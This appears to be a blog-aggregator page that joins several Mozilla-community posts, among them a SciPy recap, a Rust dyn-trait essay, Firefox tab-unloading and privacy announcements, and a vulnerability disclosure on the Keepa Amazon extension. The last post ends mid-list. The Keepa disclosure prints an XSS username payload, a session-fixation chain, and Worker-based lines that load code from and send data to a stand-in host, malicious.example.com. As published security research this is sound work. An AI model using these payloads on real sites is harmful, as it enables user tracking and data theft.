Data@MozillaMy first time experience at the SciPy conference

In July 2021, I and a few fellow Mozillians attended the SciPy conference with Mozilla as a diversity sponsor, meaning that our sponsorship went towards paying the stipend for the diversity speaker, Tess Tannenbaum. This was my first time attending a SciPy conference and also my first time supporting data science recruiting efforts at a conference.  The conference involved the showcasing of the latest open source Python projects for advancement in scientific computing.  I was eager to meet the contributors of many commonly used data science Python packages and hear about new features in upcoming releases. I was excited about having this opportunity as I strongly believe that conference attendance is an extremely rewarding experience for networking and learning about industry trends.  As a Data Scientist, my day to day work often involves using Python libraries such as scikit-learn, numpy and pandas to derive insights from data.  It felt particularly close to heart for a technical and data science geek like me to learn about code developments and use cases from other enthusiasts in the industry.

One talk that I particularly enjoyed was on the topic of Time-to-Event Modeling in Python led by Brian Kent and a few other data science experts.  Time-to-Event Modeling is also referred to as survival analysis, which was traditionally used in biological research studies to predict lifespans. The speakers at the talk were the contributors of some of the most popular survival analysis python packages.  For example, Lifelines is an introductory Python package that can be used for starters in survival analysis.  Scikit-Survival is another package built on top of Scikit-learn, which is a commonly used package in machine learning.  The focus of the talk was around how survival analysis could be useful in many different scenarios, such as in customer analytics.  There is also increasing usage of survival analysis in SaaS businesses where it can be used to predict customer churn, which can help companies plan their retention strategies.  I am curious how Mozilla can potentially apply survival analysis in ways that also respects data governance guidelines.

Like many other large group events that happened in the past year, the conference was entirely virtual and utilized various platforms to host talks and engagement activities.  In addition to having Slack as a communication tool, the conference also used Airmeet and Gather town this year.  The various sessions, tutorials and recruiting booths were hosted in Airmeet.  The more interactive talks took place in Gather town, which I find quite entertaining and enjoyable.  It is a game-like environment where everyone has a character that can walk around in the virtual environment.  It allows you to network or meet with others by walking up to other characters and their video cameras would show up as you walk towards them.  Conference organizers did a great job quickly adapting to hosting virtual gatherings and coordinating multiple tools to deliver a seamless experience.

When the SciPy conference happens next year in 2022, I will dedicate more time for networking and attending more tutorials.  This will ideally be the likely outcome with the hope that I can attend the conference in person next year.  I am also hopeful that it can be a potential opportunity to meet some remote colleagues from Mozilla in person.  Overall, the conference experience was definitely rewarding as it is important to stay current with new developments and collaborate with other technical enthusiasts in the rapidly changing scientific computing industry,

 

Resources:

Mozillians sharing the 2021 SciPy Conference experience:

SciPy 2021 conference proceedings

SciPy 2021 YouTube Channel

Niko MatsakisDyn async traits, part 3

In the previous “dyn async traits” posts, I talked about how we can think about the compiler as synthesizing an impl that performed the dynamic dispatch. In this post, I wanted to start explore a theoretical future in which this impl was written manually by the Rust programmer. This is in part a thought exercise, but it’s also a possible ingredient for a future design: if we could give programmers more control over the “impl Trait for dyn Trait” impl, then we could enable a lot of use cases.

Example

For this post, async fn is kind of a distraction. Let’s just work with a simplified Iterator trait:

trait Iterator {
    type Item;
    fn next(&mut self) -> Option<Self::Item>;
}

As we discussed in the previous post, the compiler today generates an impl that is something like this:

impl<I> Iterator for dyn Iterator<Item = I> {
    type Item = I;
    fn next(&mut self) -> Option<I> {
        type RuntimeType = ();
        let data_pointer: *mut RuntimeType = self as *mut ();
        let vtable: DynMetadata = ptr::metadata(self);
        let fn_pointer: fn(*mut RuntimeType) -> Option<I> =
            __get_next_fn_pointer__(vtable);
        fn_pointer(data)
    }
}

This code draws on the APIs from RFC 2580, along with a healthy dash of “pseduo-code”. Let’s see what it does:

Extracting the data pointer

type RuntimeType = ();
let data_pointer: *mut RuntimeType = self as *mut ();

Here, self is a wide pointer of type &mut dyn Iterator<Item = I>. The rules for as state that casting a wide pointer to a thin pointer drops the metadata1, so we can (ab)use that to get the data pointer. Here I just gave the pointer the type *mut RuntimeType, which is an alias for *mut () — i.e., raw pointer to something. The type alias RuntimeType is meant to signify “whatever type of data we have at runtime”. Using () for this is a hack; the “proper” way to model it would be with an existential type. But since Rust doesn’t have those, and I’m not keen to add them if we don’t have to, we’ll just use this type alias for now.

Extracting the vtable (or DynMetadata)

let vtable: DynMetadata = ptr::metadata(self);

The ptr::metadata function was added in RFC 2580. Its purpose is to extract the “metadata” from a wide pointer. The type of this metadata depends on the type of wide pointer you have: this is determined by the Pointee trait[^noreferent]. For dyn types, the metadata is a DynMetadata, which just means “pointer to the vtable”. In today’s APIs, the DynMetadata is pretty limited: it lets you extract the size/alignment of the underlying RuntimeType, but it doesn’t give any access to the actual function pointers that are inside.

Extracting the function pointer from the vtable

let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
    __get_next_fn_pointer__(vtable);

Now we get to the pseudocode. Somehow, we need a way to get the fn pointer out from the vtable. At runtime, the way this works is that each method has an assigned offset within the vtable, and you basically do an array lookup; kind of like vtable.methods()[0], where methods() returns a array &[fn()] of function pointers. The problem is that there’s a lot of “dynamic typing” going on here: the signature of each one of those methods is going to be different. Moreover, we’d like some freedom to change how vtables are laid out. For example, the ongoing (and awesome!) work on dyn upcasting by Charles Lew has required modifying our vtable layout, and I expect further modification as we try to support dyn types with multiple traits, like dyn Debug + Display.

So, for now, let’s just leave this as pseudocode. Once we’ve finished walking through the example, I’ll return to this question of how we might model __get_next_fn_pointer__ in a forwards compatible way.

One thing worth pointing out: the type of fn_pointer is a fn(*mut RuntimeType) -> Option<I>. There are two interesting things going on here:

  • The argument has type *mut RuntimeType: using the type alias indicates that this function is known to take a single pointer (in fact, it’s a reference, but those have the same layout). This pointer is expected to point to the same runtime data that self points at — we don’t know what it is, but we know that they’re the same. This works because self paired together a pointer to some data of type RuntimeType along with a vtable of functions that expect RuntimeType references.2
  • The return type is Option<I>, where I is the item type: this is interesting because although we don’t know statically what the Self type is, we do know the Item type. In fact, we will generate a distinct copy of this impl for every kind of item. This allows us to easily pass the return value.

Calling the function

fn_pointer(data)

The final line in the code is very simple: we call the function! It returns an Option<I> and we can return that to our caller.

Returning to the pseudocode

We relied on one piece of pseudocode in that imaginary impl:

let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
    __get_next_fn_pointer__(vtable);

So how could we possibly turn __get_next_fn_pointer__ from pseudocode into real code? There are two things worth noting:

  • First, the name of this function already encodes the method we want (next). We probably don’t want to generate an infinite family of these “getter” functions.
  • Second, the signature of the function is specific to the method we want, since it returns a fn type(fn *mut RuntimeType) -> Option<I>) that encodes the signature for next (with the self type changed, of course). This seems better than just returning a generic signature like fn() that must be cast manually by the user; less opportunity for error.

Using zero-sized fn types as the basis for an API

One way to solve these problems would be to build on the trait system. Imagine there were a type for every method, let’s call it A, and that this type implemented a trait like AssociatedFn:

trait AssociatedFn {
    // The type of the associated function, but as a `fn` pointer
    // with the self type erased. This is the type that would be
    // encoded in the vtable.
    type FnPointer;

     // maybe other things
}

We could then define a generic “get function pointer” function like so:

fn associated_fn<A>(vtable: DynMetadata) -> A::FnPtr
where
    A: AssociatedFn

Now instead of __get_next_fn_pointer__, we can write

type NextMethodType =  /* type corresponding to the next method */;
let fn_pointer: fn(*mut RuntimeType) -> Option<I> = 
   associated_fn::<NextMethodType>(vtable);

Ah, but what is this NextMethodType? How do we get the type for the next method? Presumably we’d have to introduce some syntax, like Iterator::item.

This idea of a type for associated functions is very close (but not identical) to an already existing concept in Rust: zero-sized function types. As you may know, the type of a Rust function is in fact a special zero-sized type that uniquely identifies the function. There is (presently, anyway) no syntax for this type, but you can observe it by printing out the size of values (playground):

fn foo() { }

// The type of `f` is not `fn()`. It is a special, zero-sized type that uniquely
// identifies `foo`
let f = foo;
println!({}, sizeof_value(&f)); // prints 0

// This type can be coerced to `fn()`, which is a function pointer
let g: fn() = f;
println!({}, sizeof_value(&g)); // prints 8

There are also types for functions that appear in impls. For example, you could get an instance of the type that represents the next method on vec::IntoIter<u32> like so:

let x = <vec::IntoIter<u32> as Iterator>::next;
println!({}, sizeof_value(&f)); // prints 0

Where the zero-sized types don’t fit

The existing zero-sized types can’t be used for our “associated function” type for two reasons:

  • You can’t name them! We can fix this by adding syntax.
  • There is no zero-sized type for a trait function independent of an impl.

The latter point is subtle3. Before, when I talked about getting the type for a function from an impl, you’ll note that I gave a fully qualified function name, which specified the Self type precisely:

let x = <vec::IntoIter<u32> as Iterator>::next;
//       ^^^^^^^^^^^^^^^^^^ the Self type

But what we want in our impl is to write code that doesn’t know what the Self type is! So this type that exists in the Rust type system today isn’t quite what we need. But it’s very close.

Conclusion

I’m going to leave it here. Obviously, I haven’t presented any kind of final design, but we’ve seen a lot of tantalizing ingredients:

  • Today, the compiler generates a impl Iterator for dyn Iterator that extract functions from a vtable and invokes them by magic.
  • But, using the APIs from RFC 2580, you can almost write the by hand. What is missing is a way to extract a function pointer from a vtable, and what makes that hard is that we need a way to identify the function we are extracting
  • We have zero-sized types that represent functions today, but we don’t have a way to name them, and we don’t have zero-sized types for functions in traits, only in impls.

Of course, all of the stuff I wrote here was just about normal functions. We still need to circle back to async functions, which add a few extra wrinkles. Until next time!

Footnotes

  1. I don’t actually like these rules, which have bitten me a few times. I think we should introduce an accessor function, but I didn’t see one in RFC 2580 — maybe I missed it, or it already exists. 

  2. If you used unsafe code to pair up a random pointer with an unrelated vtable, then hilarity would ensue here, as there is no runtime checking that these types line up. 

  3. And, in fact, I didn’t see it until I was writing this blog post! 

Hacks.Mozilla.OrgControl your data for good with Rally

Let’s face it, if you have ever used the internet or signed up for an online account, or even read a blog post like this one, chances are that your data has left a permanent mark on the interwebs and online services have exploited your data without your awareness for a very long time. 

The Fight for Privacy

The fight for privacy is compounded by the rise in misinformation and platforms like Facebook willingly sharing information that is untrustworthy, shutting down platforms like Crowdtangle and recently terminating the accounts of New York University researchers that built Ad Observer, an extension dedicated to bringing greater transparency to political advertising. We think a better internet is one where people have more control over their data. 

Contribute your data for good

In a world where data and AI are reshaping society, people currently have no tangible way to put their data to work for the causes they believe in. To address this, we built the Rally platform, a first-of-its-kind tool that enables you to contribute your data to specific studies and exercise consent at a granular level. Mozilla Rally puts you in control of your data while building a better Internet and a better society. 

Mozilla Rally

Like Mozilla, Rally is a community-driven open source project and we publish our code on GitHub, ensuring that it’s open-source and freely available for you to audit. Privacy, control and transparency are foundational to Rally. Participating is voluntary, meaning we won’t collect data unless you agree to it first, and we’ll provide you with a clear understanding of what we have access to at every step of the way.

 

With your help, we can create a safer, more transparent, and more equitable internet that protects people, not Big Tech. 

Interested?

Rally needs users and is currently available on Firefox. In the future, we will expand to other web browsers. We’re currently looking for users who are residents in the United States, age 19 and older. 

Protecting the internet and its users is hard work!  We’re also hiring to grow our Rally Team.

 

The post Control your data for good with Rally appeared first on Mozilla Hacks - the Web developer blog.

Support.Mozilla.OrgIntroducing Abby Parise

Hi folks,

It’s with great pleasure that I introduce Abby Parise, who is the latest addition to the Customer Experience team. Abby is taking the role of Support Content Manager, so you’ll definitely see more of her in SUMO. If you were with us or have watched September’s community call, you might’ve seen her there.

Here’s a brief introduction from Abby:

Hi there! My name is Abby and I’m the new Support Content Manager for Mozilla. I’m a longtime Firefox user with a passion for writing compelling content to help users achieve their goals. I’m looking forward to getting to know our contributors and would love to hear form you on ideas to make our content more helpful and user-friendly!

Please join me to welcome Abby!

Hacks.Mozilla.OrgTab Unloading in Firefox 93

Starting with Firefox 93, Firefox will monitor available system memory and, should it ever become so critically low that a crash is imminent, Firefox will respond by unloading memory-heavy but not actively used tabs. This feature is currently enabled on Windows and will be deployed later for macOS and Linux as well. When a tab is unloaded, the tab remains in the tab bar and will be automatically reloaded when it is next selected. The tab’s scroll position and form data are restored just like when the browser is restarted with the restore previous windows browser option.

On Windows, out-of-memory (OOM) situations are responsible for a significant number of the browser and content process crashes reported by our users. Unloading tabs allows Firefox to save memory leading to fewer crashes and avoids the associated interruption in using the browser.

We believe this may especially benefit people who are doing heavy browsing work with many tabs on resource-constrained machines. Or perhaps those users simply trying to play a memory-intensive game or using a website that goes a little crazy. And of course, there are the tab hoarders, (no judgement here). Firefox is now better at surviving these situations.

We have experimented with tab unloading on Windows in the past, but a problem we could not get past was that finding a balance between decreasing the browser’s memory usage and annoying the user because there’s a slight delay as the tab gets reloaded, is a rather difficult exercise, and we never got satisfactory results.

We have now approached the problem again by refining our low-memory detection and tab selection algorithm and narrowing the action to the case where we are sure we’re providing a user benefit: if the browser is about to crash. Recently we have been conducting an experiment on our Nightly channel to monitor how tab unloading affects browser use and the number of crashes our users encounter. We’ve seen encouraging results with that experiment. We’ll continue to monitor the results as the feature ships in Firefox 93.

With our experiment on the Nightly channel, we hoped to see a decrease in the number of OOM crashes hit by our users. However, after the month-long experiment, we found an overall significant decrease in browser crashes and content process crashes. Of those remaining crashes, we saw an increase in OOM crashes. Most encouragingly, people who had tab unloading enabled were able to use the browser for longer periods of time. We also found that average memory usage of the browser increased.

The latter may seem very counter-intuitive, but is easily explained by survivorship bias. Much like in the archetypal example of the Allied WWII bombers with bullet holes, browser sessions that had such high memory usage would have crashed and burned in the past, but are now able to survive by unloading tabs just before hitting the critical threshold.

The increase in OOM crashes, also very counter-intuitive, is harder to explain. Before tab unloading was introduced, Firefox already responded to Windows memory-pressure by triggering an internal memory-pressure event, allowing subsystems to reduce their memory use. With tab unloading, this event is fired after all possible unloadable tabs have been unloaded.

This may account for the difference. Another hypothesis is that it’s possible our tab unloading sometimes kicks in a fraction too late and finds the tabs in a state where they can’t even be safely unloaded any more.

For example, unloading a tab requires a garbage collection pass over its JavaScript heap. This needs some additional temporary storage that is not available, leading to the tab crashing instead of being unloaded but still saving the entire browser from going down.

We’re working on improving our understanding of this problem and the relevant heuristics. But given the clearly improved outcomes for users, we felt there was no point in holding back the feature.

When does Firefox automatically unload tabs?

When system memory is critically low, Firefox will begin automatically unloading tabs. Unloading tabs could disturb users’ browsing sessions so the approach aims to unload tabs only when necessary to avoid crashes. On Windows, Firefox gets a notification from the operating system (setup using CreateMemoryResourceNotification) indicating that the available physical memory is running low. The threshold for low physical memory is not documented, but appears to be around 6%. Once that occurs, Firefox starts periodically checking the commit space (MEMORYSTATUSEX.ullAvailPageFile).

When the commit space reaches a low-memory threshold, which is defined with the preference “browser.low_commit_space_threshold_mb”, Firefox will unload one tab, or if there are no unloadable tabs, trigger the Firefox-internal memory-pressure warning allowing subsystems in the browser to reduce their memory use. The browser then waits for a short period of time before checking commit space again and then repeating this process until available commit space is above the threshold.

We found the checks on commit space to be essential for predicting when a real out-of-memory situation is happening. As long as there is still swap AND physical memory available, there is no problem. If we run out of physical memory and there is swap, performance will crater due to paging, but we won’t crash.

On Windows, allocations fail and applications will crash if there is low commit space in the system even though there is physical memory available because Windows does not overcommit memory and can refuse to allocate virtual memory to the process in this case. In other words, unlike Linux, Windows always requires commit space to allocate memory.

How do we end up in this situation? If some applications allocate memory but do not touch it, Windows does not assign the physical memory to such untouched memory. We have observed graphics drivers doing this, leading to low swap space when plenty of physical memory is available.

In addition, crash data we collected indicated that a surprising number of users with beefy machines were in this situation, some perhaps thinking that because they had a lot of memory in their machine, the Windows swap could be reduced to the bare minimum. You can see why this is not a good idea!

How does Firefox choose which tabs to unload first?

Ideally, only tabs that are no longer needed will be unloaded and the user will eventually restart the browser or close unloaded tabs before ever reloading them. A natural metric is to consider when the user has last used a tab. Firefox unloads tabs in least-recently-used order.

Tabs playing sound, using picture-in-picture, pinned tabs, or tabs using WebRTC (which is used for video and audio conferencing sites) are weighted more heavily so they are less likely to be unloaded. Tabs in the foreground are never unloaded. We plan to do more experiments and continue to tune the algorithm, aiming to reduce crashes while maintaining performance and being unobtrusive to the user.

about:unloads

For diagnostic and testing purposes, a new page about:unloads has been added to display the tabs in their unload-priority-order and to manually trigger tab unloading. This feature is currently in beta and will ship with Firefox 94.

Screenshot of the about:unloads page in beta planned for Firefox 94.

Screenshot of the about:unloads page in beta planned for Firefox 94.

Browser Extensions

Some browser extensions already offer users the ability to unload tabs. We expect these extensions to interoperate with automatic tab unloading as they use the same underlying tabs.discard() API. Although it may change in the future, today automatic tab unloading only occurs when system memory is critically low, which is a low-level system metric that is not exposed by the WebExtensions API. (Note: an extension could use the native messaging support in the WebExtensions API to accomplish this with a separate application.) Users will still be able to benefit from tab unloading extensions and those extensions may offer more control over when tabs are unloaded, or deploy more aggressive heuristics to save more memory.

Let us know how it works for you by leaving feedback on ideas.mozilla.org or reporting a bug. For support, visit support.mozilla.org.Firefox crash reporting and telemetry adheres to our data privacy principles. See the Mozilla Privacy Policy for more information.

Thanks to Gian-Carlo Pascutto, Toshihito Kikuchi, Gabriele Svelto, Neil Deakin, Kris Wright, and Chris Peterson, for their contributions to this blog post and their work on developing tab unloading in Firefox.

The post Tab Unloading in Firefox 93 appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogNews from Firefox Focus and Firefox on Mobile

One of our promises this year was to deliver ways that can help you navigate the web easily and get you quickly where you need to go. We took a giant step in that direction earlier this year when we shared a new Firefox experience. We were on a mission to save you time and streamline your everyday use of the browser. This month, we continue to deliver on that mission with new features in our Firefox on mobile products. For our Firefox Focus mobile users, we have a fresh redesign plus new features including shortcuts to get you faster to the things you want to get to. This Cybersecurity Awareness month, you can manage your passwords and take them wherever you go whenever you use your Firefox on Android mobile app. 

Fresh, new Firefox Focus 

Since its launch, Firefox Focus has been a favorite app with its minimal design, streamlined features and for those times when you want to do a super quick search without the distractions. So, when it came to refreshing Firefox Focus we wanted to offer a simple, privacy by default companion app, allowing users to quickly complete searches without distraction and worry of being tracked or bombarded with advertisements. We added a fresh new look with new colors, a new logo and a dark theme. We added a shortcut feature so that users can get to the sites they visit the most. And with privacy in mind you will see the privacy Tracking Protection Shield icon which is accessible from the search bar so you can quickly turn the individual trackers on or off when you click the shield icon. Plus, we added a global counter that shows you all the trackers blocked for you. Check out the new Firefox Focus and try it for life’s “get in and get out” moments. 

<figcaption>New shortcut feature to get you to the sites you visit most</figcaption>

Got a ton of passwords? Keep them safe on Firefox on Android

What do Superman, Black Widow and Wolverine have in common? They make horrible passwords. At least that’s what we discovered when we took a look to see how fortified superhero passwords are in the fight against hackers and breaches. You can see how your favorite superheroes fared in “Superhero passwords may be your kryptonite wherever you go online.”  

This Cybersecurity Awareness month, we added new features on Firefox on Android, to keep your passwords safe. We’ve increasingly become dependent on the web, whether it’s signing up for streaming services or finding new ways to connect with families and friends, we’ve all had to open an account and assign a completely new password. Whether it’s 10 or 100 passwords, you can take your passwords wherever you go on Firefox on Android. These new features will be available on iOS later this year. The new features include:

Creating and adding new passwords is easy – Now, when you create an account for any app on your mobile device, you can also create and add a new password, which you can save directly in the Firefox browser and you can use it on both mobile and desktop.  

<figcaption>Create and add new passwords</figcaption>

  • Take your passwords with you on the go – Now you can easily autofill your password on your phone and use any password you’ve saved in the browser to log into any online account like your Twitter or Instagram app. No need to open a web page. Plus, if you have a Firefox account then you can sync all your passwords across desktop and mobile devices. It’s that seamless and simple. 
<figcaption>Sync all your passwords across desktop and mobile devices</figcaption>

  • Unlock your passwords with your fingerprint or face – Now only you can safely open your accounts when you use your operating system’s biometric security, such as your face or your fingerprint touch to unlock the access page to your logins and passwords.

Firefox coming soon to a Windows store near you

Microsoft has loosened restrictions on its Windows Store that effectively banned third-party browsers from the store. We have been advocating for years for more user choice and control on the Windows operating system. We welcome the news that their store is now more open to companies and applications, including independent browsers like Firefox. We believe that a healthier internet is one where people have an opportunity to choose from a diverse range of browsers and browser engines. Firefox will be available in the Windows store later this year. 

Get the fast, private browser for your desktop and mobileFirefox on Android, Firefox for iOS and Firefox Focus today.

For more on Firefox:

11 secret tips for Firefox that will make you an internet pro

7 things to know (and love) about the new Firefox for Android

Modern, clean new Firefox clears the way to all you need online

Behind the design: A fresh new Firefox

The post News from Firefox Focus and Firefox on Mobile appeared first on The Mozilla Blog.

Wladimir PalantAbusing Keepa Price Tracker to track users on Amazon pages

As we’ve seen before, shopping assistants usually aren’t a good choice of browser add-on if you value either your privacy or security. This impression is further reinforced by Keepa, the Amazon Price Tracker. The good news here: the scope of this extension is limited to Amazon properties. But that’s all the good news there are. I’ve already written about excessive data collection practices in this extension. I also reported two security vulnerabilities to the vendor.

Today we’ll look at a persistent Cross-Site Scripting (XSS) vulnerability in the Keepa Box. This one allowed any attackers to track you across Amazon web properties. The second vulnerability exposed Keepa’s scraping functionality to third parties and could result in data leaks.

Meat grinder with the Keepa logo on its side is working on the Amazon logo, producing lots of prices and stars<figcaption> Image credits: Keepa, palomaironique, Nikon1803 </figcaption>

Persistent XSS vulnerability

What is the Keepa Box?

When you open an Amazon product page, the Keepa extension will automatically inject a frame like https://keepa.com/iframe_addon.html#3-0-B07FCMBLV6 into it. Initially, it shows you a price history for the article, but there is far more functionality here.

Complicated graph showing the price history of an Amazon article, with several knops to tweak the presentation as well as several other options such as logging in.

This page, called the Keepa Box, is mostly independent of the extension. Whether the extension is present or not, it lets you look at the data, log into an account and set alerts. The extension merely assists it by handling some messages, more on that below.

Injecting HTML code

The JavaScript code powering the Keepa Box is based on jQuery, security-wise a very questionable choice of framework. As common with jQuery-based projects, this one will compose HTML code from strings. And it doesn’t bother properly escaping special characters, so there are plenty of potential HTML injection points. For example this one:

html = storage.username ?
          "<span id=\"keepaBoxSettings\">" + storage.username + "</span>" :
          "<span id=\"keepaBoxLogin\">" + la._9 + "</span>";

If the user is logged in, the user name as set in storage.username will be displayed. So a malicious user name like me<img src=x onerror=alert(1)> will inject additional JavaScript code into the page (here displaying a message). While it doesn’t seem possible to change the user name retroactively, it was possible to register an account with a user name like this one.

Now this page is using the Content Security Policy mechanism which could have prevented the attack. But let’s have a look at the script-src directive:

script-src 'self' 'unsafe-inline' https://*.keepa.com https://apis.google.com
    https://*.stripe.com https://*.googleapis.com https://www.google.com/recaptcha/
    https://www.gstatic.com/recaptcha/ https://completion.amazon.com
    https://completion.amazon.co.uk https://completion.amazon.de
    https://completion.amazon.fr https://completion.amazon.co.jp
    https://completion.amazon.ca https://completion.amazon.cn
    https://completion.amazon.it https://completion.amazon.es
    https://completion.amazon.in https://completion.amazon.nl
    https://completion.amazon.com.mx https://completion.amazon.com.au
    https://completion.amazon.com.br;

That’s lots of different websites, some of which might allow circumventing the protection. But the 'unsafe-inline' keyword makes complicated approaches unnecessary, inline scripts are allowed. Already the simple attack above works.

Deploying session fixation

You probably noticed that the attack described above relies on you choosing a malicious user name and logging into that account. So far this is merely so-called Self-XSS: the only person you can attack is yourself. Usually this isn’t considered an exploitable vulnerability.

This changes however if you can automatically log other people into your account. Then you can create a malicious account in advance, after which you make sure your target is logged into it. Typically, this is done via a session fixation attack.

On the Keepa website, the session is determined by a 64 byte alphanumeric token. In the JavaScript code, this token is exposed as storage.token. And the login procedure involves redirecting the user to an address like https://keepa.com/#!r/4ieloesi0duftpa385nhql1hjlo4dcof86aecsr7r8est7288p9ge2m05fvbnoih which will store 4ieloesi0duftpa385nhql1hjlo4dcof86aecsr7r8est7288p9ge2m05fvbnoih as the current session token.

So the complete attack would look like this:

  • Register an account with a malicious user name like me<img src=x onerror=alert(1)>
  • Check the value of storage.token to extract the session token
  • If a Keepa user visits your website, make sure to open https://keepa.com/#!r/<token> in a pop-up window (can be closed immediately afterwards)

Your JavaScript code (here alert(1)) will be injected into each and every Keepa Box of this user now. As the Keepa session is persistent, it will survive browser restarts. And it will even run on the main Keepa website if the user logs out, giving you a chance to prevent them from breaking out of the session fixation.

Keepa addressed this vulnerability by forbidding angled brackets in user names. The application still contains plenty of potentially exploitable HTML injection points, Content Security Policy hasn’t been changed either. The session fixation attack is also still possible.

The impact

The most obvious consequence of this vulnerability: the malicious code can track all Amazon products that the user looks at. And then it can send messages that the Keepa extension will react to. These are mostly unspectacular except for two:

  • ping: retrieves the full address of the Amazon page, providing additional information beyond the mere article ID
  • openPage: opens a Private Browsing / Incognito window with a given page address (seems to be unused by Keepa Box code but can be abused by malicious code nevertheless)

So the main danger here is that some third party will be able to spy on the users whenever they go to Amazon. But for that it needs to inject considerable amounts of code, and it needs to be able to send data back. With user names being at most 100 characters long, and with Keepa using a fairly restrictive Content Security Policy: is it even possible?

Usually, the approach would be to download additional JavaScript code from the attacker’s web server. However, Keepa’s Content Security Policy mentioned above only allows external scripts from a few domains. Any additional scripts still have to be inserted as inline scripts.

Most other Content Security Policy directives are similarly restrictive and don’t allow connections to arbitrary web servers. The only notable exception is worker-src:

worker-src 'self' blob: data: *;

No restrictions here for some reason, so the malicious user name could be something like:

<img
  src=x
  onerror="new Worker('//malicious.example.com').onmessage=e=>document.write(e.data)">

This will create a Web Worker with the script downloaded from malicious.example.com. Same-origin policy won’t prevent it from running if the right CORS headers are set. And then it will wait for HTML code to be sent by the worker script. The HTML code will be added to the document via document.write() and can execute further JavaScript code, this time without any length limits.

The same loophole in the Content Security Policy can be used to send exfiltrated data to an external server: new Worker("//malicious.example.com?" + encodeURLComponent(data)) will be able to send data out.

Data exposure vulnerability

My previous article on Keepa already looked into Keepa’s scraping functionality, in particular how Keepa loads Amazon pages in background to extract data from them. When a page loads, Keepa tells its content script which scraping filters to use. This isn’t done via inherently secure extension communication APIs but rather via window.postMessage(). The handling in the content script essentially looks as follows:

window.addEventListener("message", function (event) {
  if (event.source == window.parent && event.data) {
    var instructions = event.data.value;
    if ("data" == event.data.key && instructions.url == document.location) {
      scrape(instructions, function (scrapeResult) {
        window.parent.postMessage({ sandbox: scrapeResult }, "*");
      });
    }
  }
}, false);

This will accept scraping instructions from the parent frame, regardless of whether the parent frame belongs to the extension or not. The content script will perform the scraping, potentially extracting security tokens or private information, and send the results back to its parent frame.

A malicious website could abuse this by loading a third-party page in a frame, then triggering the scraping functionality to extract arbitrary data from it, something that same-origin policy normally prevents. The catch: the content script is only active on Amazon properties and Keepa’s own website. And luckily most Amazon pages with sensitive data don’t allow framing by third parties.

Keepa’s website on the other hand is lacking such security precautions. So my proof-of-concept page would extract data from the Keepa forum if you were logged into it: your user name, email address, number of messages and whether you are a privileged user. Extracting private messages or any private data available to admins would have been easy as well. All that without any user interaction and without any user-visible effects.

This vulnerability has been addressed in Keepa 3.88 by checking the message origin. Only messages originating from an extension page are accepted now, messages from websites will be ignored.

Conclusions

Keepa’s reliance on jQuery makes it susceptible to XSS vulnerabilities, with the one described above being only one out of many potential vulnerabilities. While the website itself probably isn’t a worthwhile target, persistent XSS vulnerabilities in Keepa Box expose users to tracking by arbitrary websites. This tracking is limited to shopping on Amazon websites but will expose much potentially private information for the typical Keepa user.

Unlike most websites, Keepa deployed a Content Security Policy that isn’t useless. By closing the remaining loopholes, attacks like the one presented here could be made impossible or at least considerably more difficult. To date, the vulnerability has been addressed minimally however and the holes in the Content Security Policy remain.

Keepa exposing its scraping functionality to arbitrary websites could have had severe impact. With any website being able to extract security tokens this way, impersonating the user towards Amazon would have been possible. Luckily, security measures on Amazon’s side prevented this scenario. Nevertheless, this vulnerability was very concerning. The fact that the extension still doesn’t use inherently secure communication channels for this functionality doesn’t make it better.

Timeline

  • 2021-07-07: Reported the vulnerabilities to the vendor via email (no response and no further communication)
  • 2021-09-15: Keepa 3.88 released, fixing data exposure vulnerability
  • 2021-10-04: Published article (90 days deadline)

Mozilla Security BlogFirefox 93 features an improved SmartBlock and new Referrer Tracking Protections

We are happy to announce that the Firefox 93 release brings two exciting privacy improvements for users of Strict Tracking Protection and Private Browsing. With a more comprehensive SmartBlock 3.0, we combine a great browsing experience with strong tracker blocking. In addition, our new and enhanced referrer tracking protection prevents sites from colluding to share sensitive user data via HTTP referrers.

SmartBlock 3.0

In Private Browsing and Strict Tracking Protection, Firefox goes to great lengths to protect your web browsing activity from trackers. As part of this, the built-in content blocking will automatically block third-party scripts, images, and other content from being loaded from cross-site tracking companies reported by Disconnect. This type of aggressive blocking could sometimes bring small inconveniences, such as missing images or bad performance. In some rare cases, it could even result in a feature malfunction or an empty page.

To compensate, we developed SmartBlock, a mechanism that will intelligently load local, privacy-preserving alternatives to the blocked resources that behave just enough like the original ones to make sure that the website works properly.

The third iteration of SmartBlock brings vastly improved support for replacing the popular Google Analytics scripts and added support for popular services such as Optimizely, Criteo, Amazon TAM and various Google advertising scripts.

As usual, these replacements are bundled with Firefox and can not track you in any way.

HTTP Referrer Protections

The HTTP Referer [sic] header is a browser signal that reveals to a website which location “referred” the user to that website’s server. It is included in navigations and sub-resource requests a browser makes and is frequently used by websites for analytics, logging, and cache optimization. When sent as part of a top-level navigation, it allows a website to learn which other website the user was visiting before.

This is where things get problematic. If the browser sends the full URL of the previous site, then it may reveal sensitive user data included in the URL. Some sites may want to avoid being mentioned in a referrer header at all.

The Referrer Policy was introduced to address this issue: it allows websites to control the value of the referrer header so that a stronger privacy setting can be established for users. In Firefox 87, we went one step further and decided to set the new default referrer policy to strict-origin-when-cross-origin which will automatically trim the most sensitive parts of the referrer URL when it is shared with another website. As such, it prevents sites from unknowingly leaking private information to trackers.

However, websites can still override the introduced default trimming of the referrer, and hence effectively deactivate this protection and send the full URL anyway. This would invite websites to collude with trackers by choosing a more permissive referrer policy and as such remains a major privacy issue.

With the release of version 93, Firefox will ignore less restrictive referrer policies for cross-site requests, such as ‘no-referrer-when-downgrade’, ‘origin-when-cross-origin’, and ‘unsafe-url’ and hence renders such privacy violations ineffective. In other words, Firefox will always trim the HTTP referrer for cross-site requests, regardless of the website’s settings.

For same-site requests, websites can of course still send the full referrer URL.

Enabling these new Privacy Protections

As a Firefox user who is using Strict Tracking Protection and Private Browsing, you can benefit from the additionally provided privacy protection mechanism as soon as your Firefox auto-updates to Firefox 93. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the internet.

The post Firefox 93 features an improved SmartBlock and new Referrer Tracking Protections appeared first on Mozilla Security Blog.

Mozilla Security BlogFirefox 93 protects against Insecure Downloads

 

Downloading files on your device still exposes a major security risk and can ultimately lead to an entire system compromise by an attacker. Especially because the security risks are not apparent. To better protect you from the dangers of insecure, or even undesired downloads, we integrated the following two security enhancements which will increase security when you download files on your computer. In detail, Firefox will:

  • block insecure HTTP downloads on a secure HTTPS page, and
